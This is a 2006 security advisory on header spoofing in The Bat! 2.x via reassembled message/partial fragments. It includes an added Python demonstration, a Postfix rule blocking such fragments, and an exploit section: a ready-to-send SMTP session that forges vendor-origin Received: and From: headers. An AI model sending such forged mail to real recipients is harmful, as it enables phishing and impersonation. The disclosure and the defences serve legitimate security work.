Source: securityvulns.com, SECURITYVULNS:DOC:11310
Published: Feb 06, 2006

SECURITY.NNOV: The Bat! 2.x message headers spoofing

Mirror: vulners.com

Title: The Bat! 2.x message headers spoofing
Author: 3APA3A <[email protected]>
Homepage: http://www.security.nnov.ru/
Advisory URL: http://www.security.nnov.ru/advisories/thebatspoof.asp
Vendor: RitLabs
Vendor's page http://thebat.net/
Application: The Bat 2.x (2.12.04 tested)
Not vulnerable: The Bat! 3.5
Remote: Yes, against client
Category: Information spoofing

Intro:

The Bat! is a very convenient, powerful and (compared with other MUAs)
secure MUA (Mail User Agent) with many professional features: templates,
macros, a Bayesian spam filter, etc. It is a commercial product from
RitLabs.

Vulnerability:

A design flaw in the way The Bat! displays message/partial messages
(RFC 2046, section 5.2.2) allows an attacker to spoof the RFC 822 headers
of the original message, including all Received: and Message-ID: headers.
This makes it possible to create an untraceable message and to spoof the
message origin, including the sender's network.

Details:

The Bat! silently reassembles a message/partial message and shows the
encapsulated data. The headers shown are those of the encapsulated
(inner) message; the real headers of the fragments, including the
Received: lines added by the receiving mail servers, are lost completely.
RFC 2046, section 5.2.2.1, requires the opposite: the reassembled message
keeps the headers of the first enclosing fragment, and only the Content-*
fields plus Subject:, Message-ID:, Encrypted: and MIME-Version: are taken
from the enclosed message. Because the inner message is entirely
attacker-supplied, every header the user sees is under attacker control.
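The following Python script is an added example and is not code from the advisory or from RitLabs. It reassembles a two-fragment message/partial message in two ways: the way RFC 2046, section 5.2.2.1, prescribes (outer headers kept, only Content-*, Subject:, Message-ID:, Encrypted: and MIME-Version: taken from the inner message) and the naive way described above (the inner message shown as-is). The two fragments, hostnames, addresses and queue ids are constructed for this example and modelled on the advisory's exploit; the relay-added Received: line on the fragments stands for the one header the attacker cannot forge.

```python
"""Added example: RFC 2046 reassembly of message/partial versus naive
reassembly. Fragments, hosts and addresses below are constructed."""
from email.message import Message
from email.parser import HeaderParser

# Fragment 1 as it sits in the victim's mailbox. The first Received: header
# was added by the victim's relay (constructed, TEST-NET address); the body
# is an attacker-written "inner" message with forged Received:/From:.
PART1 = """\
Received: from attacker-host (attacker-host [192.0.2.10])
    by mail.example.com (Postfix) with ESMTP id 1A2B3C4D5E
    for <victim@example.com>; Mon, 31 Jan 2006 13:31:00 +0300 (MSK)
From: Attacker <attacker@example.net>
To: victim@example.com
Subject: fragment 1
Message-ID: <frag1@example.net>
MIME-Version: 1.0
Content-Type: message/partial; id="reassembly-id@example.net"; number=1; total=2

Received: from mail.vendor.example (mail.vendor.example [192.0.2.20])
    by mail.example.com (Postfix) with ESMTP id FFFFFFFFFF
    for <victim@example.com>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
From: The Bat! developers <support@vendor.example>
To: victim@example.com
Subject: Re: your licence
Message-ID: <forged@vendor.example>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii

Dear user,
"""

# Fragment 2: same id, number=2, carries the rest of the inner body.
PART2 = """\
Received: from attacker-host (attacker-host [192.0.2.10])
    by mail.example.com (Postfix) with ESMTP id 1A2B3C4D5F
    for <victim@example.com>; Mon, 31 Jan 2006 13:31:05 +0300 (MSK)
From: Attacker <attacker@example.net>
To: victim@example.com
Subject: fragment 2
Message-ID: <frag2@example.net>
MIME-Version: 1.0
Content-Type: message/partial; id="reassembly-id@example.net"; number=2; total=2

this text is forged, but the headers you see say otherwise.
"""

# Header fields that RFC 2046 5.2.2.1 takes from the enclosed message.
INNER_ONLY = ('subject', 'message-id', 'encrypted', 'mime-version')


def parse_fragment(raw):
    """Parse headers into a Message; the body stays a raw string."""
    return HeaderParser().parsestr(raw)


def partial_params(msg):
    """Return (id, number, total) for a message/partial fragment, else None."""
    if msg.get_content_type() != 'message/partial':
        return None
    total = msg.get_param('total')
    return (msg.get_param('id'), int(msg.get_param('number')),
            int(total) if total is not None else None)


def ordered_fragments(fragments):
    """Validate a fragment set (one id, one total, numbers 1..total) and
    return it sorted by fragment number."""
    params = [partial_params(m) for m in fragments]
    if any(p is None for p in params):
        raise ValueError('not every fragment is message/partial')
    ids = {p[0] for p in params}
    if len(ids) != 1:
        raise ValueError('fragments belong to different messages: %r' % ids)
    totals = {p[2] for p in params if p[2] is not None}
    if len(totals) != 1:
        raise ValueError('total= is missing or inconsistent')
    total = totals.pop()
    numbered = sorted(zip((p[1] for p in params), fragments), key=lambda t: t[0])
    if [n for n, _ in numbered] != list(range(1, total + 1)):
        raise ValueError('fragment numbers are not 1..%d' % total)
    return [m for _, m in numbered]


def _inner_field(name):
    n = name.lower()
    return n.startswith('content-') or n in INNER_ONLY


def reassemble_naive(fragments):
    """What the advisory describes: concatenate the bodies and display the
    enclosed message as-is. Every header, Received: included, is forged."""
    body = ''.join(f.get_payload() for f in ordered_fragments(fragments))
    return parse_fragment(body)


def reassemble_rfc2046(fragments):
    """RFC 2046 5.2.2.1: keep the first fragment's headers (the relay-added
    Received: lines survive); take only Content-*, Subject, Message-ID,
    Encrypted and MIME-Version from the enclosed message."""
    frags = ordered_fragments(fragments)
    inner = parse_fragment(''.join(f.get_payload() for f in frags))
    result = Message()
    for name, value in frags[0].items():
        if not _inner_field(name):
            result[name] = value
    for name, value in inner.items():
        if _inner_field(name):
            result[name] = value
    result.set_payload(inner.get_payload())
    return result


if __name__ == '__main__':
    frags = [parse_fragment(PART2), parse_fragment(PART1)]  # arrival order
    for label, fn in (('naive', reassemble_naive), ('rfc2046', reassemble_rfc2046)):
        print('== %s ==' % label)
        print(fn(frags).as_string())
```

Run stand-alone, the script prints both reassemblies: the naive one shows the forged "mail.vendor.example" Received: line and the vendor From:, while the RFC 2046 one keeps the relay's "attacker-host" Received: line and the real envelope sender while still taking the forged Subject: and Message-ID: from the inner message, which is what the RFC allows and why Message-ID: alone is never evidence of origin.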

Exploit:

Replace @example.com with the destination domain and address, then feed
the file to an SMTP relay that will deliver to the victim:
nc ip_of_smtp_relay 25 <thebatexploit.txt

-=-=-=-=- begin thebatexploit.txt -=-=-=-=-
HELO example.com
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 31 Jan 2006 13:30:00 +0300
From: 3APA3A <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: http://www.security.nnov.ru/
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@thebat.net>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
number=1; total=2

Received: from mail.ritlabs.com (mail.ritlabs.com [198.63.208.135])
by mail.example.com (Postfix) with ESMTP id 9F89619EBEB
for <[email protected]>; Mon, 31 Jan 2006 13:30:06 +0300 (MSK)
Date: Mon, 31 Jan 2006 13:30:06 +0300
From: The Bat! developers <[email protected]>
X-Mailer: The Bat! (v2.12.00)
Organization: RitLabs
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
MIME-Version: 1.0
Content-Type: text/plain; charset=Windows-1251
Content-Transfer-Encoding: 8bit

Dear Phiby,

Best wishes for you and http://phiby.com/
.
RSET
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
Date: Mon, 30 Jan 2006 13:30:06 +0300
From: 3APA3A <[email protected]>
Organization: http://www.security.nnov.ru/
X-Mailer: The Bat! (v2.12.00)
Organization: Microsoft
X-Priority: 3 (Normal)
Message-ID: <[email protected]>
To: Phiby <[email protected]>
Subject: Subject: Re[7]: //
Message-ID: <p#[email protected]@microsof.com>
MIME-Version: 1.0
Content-Type: message/partial; id="[email protected]@thebat.net";
number=2; total=2

Yours, The Bat! development team.
.
QUIT
-=-=-=-=- end thebatexploit.txt -=-=-=-=-

Workaround:

Do not trust the headers The Bat! shows for a message it has reassembled
from message/partial fragments; when the origin matters, examine the raw
fragments (or the copy kept on the mail server), whose own Received:
lines are the only ones added by your servers.
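A mail-gateway-side workaround, added here as an example and not taken from the advisory or from RitLabs: reject message/partial fragments before they reach a client that reassembles them. The fragment below assumes Postfix with a regexp: header_checks table; Content-Type: is a MIME header, so it is matched through mime_header_checks, which defaults to $header_checks. Legitimate use of message/partial is rare enough that rejecting it outright is usually acceptable, but check your own traffic first.

```text
# /etc/postfix/main.cf (assumed path)
header_checks = regexp:/etc/postfix/header_checks

# /etc/postfix/header_checks (assumed path), regexp: table
# '!' is used as the pattern delimiter so the '/' in the MIME type
# needs no escaping; Postfix regexp patterns are case-insensitive by default.
!^Content-Type:[[:space:]]*message/partial!   REJECT message/partial fragments are not accepted here
```

After editing, run `postmap` is not needed for regexp: tables; reload Postfix and test with a message whose top-level Content-Type: is message/partial, which should now be refused at DATA with the text above.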

Solution:

Upgrade to The Bat! 3.x (a paid upgrade); version 3.5 was tested and is not vulnerable.